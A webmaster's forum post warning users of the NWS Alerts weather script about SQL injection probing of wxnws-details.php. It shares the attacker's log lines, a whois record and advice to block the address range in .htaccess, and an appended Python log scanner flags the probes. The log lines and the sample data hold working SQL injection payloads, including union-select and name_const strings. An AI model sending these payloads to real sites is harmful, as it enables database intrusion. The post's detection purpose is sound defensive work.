Curly, Ken, et al.,
Came across the following in my logs for yesterday:
Line 1857: 23.91.70.52 - - [14/Jan/2017:14:29:12 -0500] "GET /wxnws-details.php?a=ARZ042'\" HTTP/1.1" 200 24877 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; yplus 5.6.02b)" 0 0 "off:-:-" 164 1307212
Line 1858: 23.91.70.52 - - [14/Jan/2017:14:29:14 -0500] "GET /wxnws-details.php?a=ARZ042 HTTP/1.1" 200 24870 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.025; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 0 0 "off:-:-" 215 343855
Line 1859: 23.91.70.52 - - [14/Jan/2017:14:29:14 -0500] "GET /wxnws-details.php?a=ARZ0422121121121212.1 HTTP/1.1" 200 24915 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; generic_01_01; InfoPath.1)" 0 0 "off:-:-" 182 347281
Line 1860: 23.91.70.52 - - [14/Jan/2017:14:29:15 -0500] "GET /wxnws-details.php?a=ARZ042%20and%201%3D1 HTTP/1.1" 200 24695 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=none; FunWebProducts; .NET CLR 1.1.4322)" 0 0 "off:-:-" 206 359951
Line 1861: 23.91.70.52 - - [14/Jan/2017:14:29:15 -0500] "GET /wxnws-details.php?a=ARZ042%20and%201%3E1 HTTP/1.1" 200 24671 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.025; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 0 0 "off:-:-" 229 368230
Line 1862: 23.91.70.52 - - [14/Jan/2017:14:29:16 -0500] "GET /wxnws-details.php?a=ARZ042%27%20and%20%27x%27%3D%27x HTTP/1.1" 200 24862 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=none; FunWebProducts; .NET CLR 1.1.4322)" 0 0 "off:-:-" 218 371431
Line 1863: 23.91.70.52 - - [14/Jan/2017:14:29:16 -0500] "GET /wxnws-details.php?a=ARZ042%27%20and%20%27x%27%3D%27y HTTP/1.1" 200 24687 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 0 0 "off:-:-" 247 346981
Line 1864: 23.91.70.52 - - [14/Jan/2017:14:29:17 -0500] "GET /wxnws-details.php?a=ARZ042\"%20and%20\"x\"%3D\"x HTTP/1.1" 200 24868 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=; YPC 3.2.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; IEMB3; IEMB3; yplus 5.1.04b)" 0 0 "off:-:-" 249 330620
Line 1865: 23.91.70.52 - - [14/Jan/2017:14:29:17 -0500] "GET /wxnws-details.php?a=ARZ042%22%20and%20%22x%22%3D%22y HTTP/1.1" 200 24671 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.025; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 0 0 "off:-:-" 241 344537
Line 1866: 23.91.70.52 - - [14/Jan/2017:14:29:18 -0500] "GET /wxnws-details.php?a=ARZ042%20AND%201=1 HTTP/1.1" 200 24917 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; dial" 0 0 "off:-:-" 157 362337
Line 1873: 23.91.70.52 - - [14/Jan/2017:14:29:19 -0500] "GET /wxnws-details.php?a=ARZ042999999.1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1 HTTP/1.1" 200 24911 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.025; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 0 0 "off:-:-" 283 373269
Line 1874: 23.91.70.52 - - [14/Jan/2017:14:29:20 -0500] "GET /wxnws-details.php?a=ARZ04299999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x HTTP/1.1" 200 24880 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=none; SV1; snprtz|S04087544802137; .NET CLR 1.1.4322)" 0 0 "off:-:-" 274 351602
Line 1875: 23.91.70.52 - - [14/Jan/2017:14:29:20 -0500] "GET /wxnws-details.php?a=ARZ04299999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x HTTP/1.1" 200 25028 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=; YPC 3.2.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; IEMB3; IEMB3; yplus 5.1.04b)" 0 0 "off:-:-" 300 348564
Line 1876: 23.91.70.52 - - [14/Jan/2017:14:29:21 -0500] "GET /wxnws-details.php?a=ARZ042%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3D1 HTTP/1.1" 200 24688 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; eMusic DLM/3; MSN Optimized;US; MSN Optimized;US)" 0 0 "off:-:-" 359 357790
Line 1877: 23.91.70.52 - - [14/Jan/2017:14:29:21 -0500] "GET /wxnws-details.php?a=ARZ042%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x HTTP/1.1" 200 24850 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 0 0 "off:-:-" 394 343385
Line 1878: 23.91.70.52 - - [14/Jan/2017:14:29:22 -0500] "GET /wxnws-details.php?a=ARZ042%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x HTTP/1.1" 200 24871 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=none; FunWebProducts; .NET CLR 1.1.4322)" 0 0 "off:-:-" 365 333894
Line 1879: 23.91.70.52 - - [14/Jan/2017:14:29:22 -0500] "GET /wxnws-details.php?a=ARZ042' HTTP/1.1" 200 24698 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; generic_01_01; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.3.04b)" 0 0 "off:-:-" 201 345922
Whois IP Information:
NetRange: 23.91.64.0 - 23.91.79.255
CIDR: 23.91.64.0/20
NetName: ASO-239164-20
NetHandle: NET-23-91-64-0-1
Parent: NET23 (NET-23-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS36444, AS36024, AS30496
Organization: A Small Orange LLC (SOL-21)
RegDate: 2013-08-29
Updated: 2014-06-13
Comment: http://www.asmallorange.com
Comment: 877-283-2612
Comment: email@asmallorange.com
Ref: https://whois.arin.net/rest/net/NET-23-91-64-0-1
OrgName: A Small Orange LLC
OrgId: SOL-21
Address: 2500 Ridgepoint Drive
City: Austin
StateProv: TX
PostalCode: 78754
Country: US
RegDate: 2012-06-11
Updated: 2014-10-28
Ref: https://whois.arin.net/rest/org/SOL-21

For those who use this script, if you are able to check your server logs, please do. Plus, if you are able, add them to your .htaccess file.
This is the first time I've seen a deliberate attempt on the NWS Alerts script. Things like this are the reason I check the server logs daily. Needless to say the CIDR was added to my .htaccess file.
John
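
The log check the post asks for, as an added example that is not part of the original post or of the NWS Alerts script: it URL-decodes the `a` parameter of each request to `/wxnws-details.php` and reports, per client IP, every value that fails an allowlist. The allowlist pattern (a code shaped like `ARZ042`), the name `probe_report`, and the sample lines with documentation IPs are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate 'a' value is a zone/county code shaped like ARZ042.
VALID_ZONE = re.compile(r"[A-Z]{2}[CZ]\d{3}")
# Optional "Line N: " prefix (as pasted in the post), client IP, request target.
LOG_LINE = re.compile(
    r'^(?:Line \d+: )?(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Labels only, to help triage; the allowlist above is what decides.
HINTS = {
    "quote": re.compile(r"['\"]"),
    "boolean-test": re.compile(r"\b(?:and|or)\b", re.I),
    "union-select": re.compile(r"\bunion\b.*\bselect\b", re.I),
}

def probe_report(lines, script="/wxnws-details.php", param="a"):
    """Map client IP -> [(decoded value, [hint, ...])] for values failing the allowlist."""
    report = defaultdict(list)
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        # Apache writes a literal double quote in the request as \" in the log.
        url = urlsplit(m.group(2).replace('\\"', '"'))
        if url.path != script:
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if not VALID_ZONE.fullmatch(value):
                hints = [name for name, rx in HINTS.items() if rx.search(value)]
                report[m.group(1)].append((value, hints))
    return dict(report)

# Constructed sample lines (documentation IPs), modelled on the entries in the post.
HEAD = ' - - [14/Jan/2017:14:29:12 -0500] "GET /wxnws-details.php?a='
TAIL = ' HTTP/1.1" 200 24870 "-" "Mozilla/4.0 (compatible; MSIE 7.0)"'
SAMPLE = [
    "203.0.113.7" + HEAD + "ARZ042" + TAIL,
    "203.0.113.7" + HEAD + "ARZ042%20and%201%3D1" + TAIL,
    "203.0.113.7" + HEAD + r"ARZ042\"%20and%20\"x\"%3D\"x" + TAIL,
    "203.0.113.7" + HEAD + "ARZ042999999.1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1" + TAIL,
    "198.51.100.20" + HEAD + "TXC453" + TAIL,
]

if __name__ == "__main__":
    for ip, hits in probe_report(SAMPLE).items():
        print(ip, len(hits), "suspicious requests")
        for value, hints in hits:
            print("   ", repr(value), hints)
```

To run it against a real log, pass an open file object as `lines`; every response in the post's log was a 200, so the status code alone would not have flagged these requests.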